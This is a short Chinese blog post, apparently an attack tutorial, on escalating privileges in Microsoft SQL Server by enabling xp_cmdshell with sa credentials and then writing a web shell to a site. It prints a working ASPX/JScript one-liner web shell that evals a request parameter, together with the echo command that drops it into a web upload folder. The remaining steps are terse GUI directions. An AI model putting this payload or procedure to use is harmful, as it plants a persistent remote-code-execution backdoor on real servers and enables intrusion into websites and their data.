SQL Server XpCmdshell()提权
在MSSQL数据库渗透测试中,xp_cmdshell是最经典的高危利用点之一。
它是SQL Server自带的扩展存储过程,可直接调用操作系统命令,拿到sa最高权限后,能快速实现服务器提权、写入WebShell拿下站点权限。
操作流程
数据库连接
使用工具连接成功
启用XpCmdshell组件
右键打开
命令执行验证
执行命令
写入 WebShell
通过命令写入 WebShell
echo|set /p="<%@ Page Language="Jscript"%>
<%eval(Request.Item["666"],"unsafe");%>" >> D:/web/upfile/affix/3.aspx
获取 Web 权限
后续开启 Web 服务直接连接即可
-END-
版权所有:晨星交流
文章标题:MSSQL渗透实战:XpCmdshell提权+WebShell写入全流程
文章链接:https://morningstar.xin/?post=136
本站文章均为原创,未经授权请勿用于任何商业用途
文章标题:MSSQL渗透实战:XpCmdshell提权+WebShell写入全流程
文章链接:https://morningstar.xin/?post=136
本站文章均为原创,未经授权请勿用于任何商业用途



